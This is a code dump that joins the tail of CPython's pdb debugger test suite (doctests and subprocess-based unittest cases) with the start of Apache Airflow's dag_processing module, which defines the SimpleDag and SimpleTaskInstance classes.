>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(support.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Failed to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Failed to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
dag_processing.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from collections import namedtuple
from importlib import import_module
import enum
from typing import Optional
import psutil
from setproctitle import setproctitle
import six
from six.moves import reload_module
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow import configuration as conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.settings import Stats
from airflow.models import errors
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
if six.PY2:
ConnectionError = IOError
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
"""
def __init__(self, dag, pickle_id=None):
"""
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
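# A minimal, self-contained sketch (not part of the Airflow API) showing how
# SimpleDag captures per-task "special" arguments. SimpleDag only reads plain
# attributes off the DAG object, so a stand-in namespace with the same attribute
# names is enough for illustration; the names below are hypothetical.
def _example_simple_dag_usage():
    from types import SimpleNamespace

    fake_dag = SimpleNamespace(
        dag_id='example_dag',
        full_filepath='/tmp/example_dag.py',
        is_paused=False,
        concurrency=16,
        tasks=[
            SimpleNamespace(task_id='extract', task_concurrency=None),
            SimpleNamespace(task_id='load', task_concurrency=2),
        ],
    )
    simple_dag = SimpleDag(fake_dag)
    assert simple_dag.task_ids == ['extract', 'load']
    # Only 'load' declared task_concurrency, so 'extract' falls through to None.
    assert simple_dag.get_task_special_arg('load', 'task_concurrency') == 2
    assert simple_dag.get_task_special_arg('extract', 'task_concurrency') is None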
class SimpleTaskInstance(object):
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
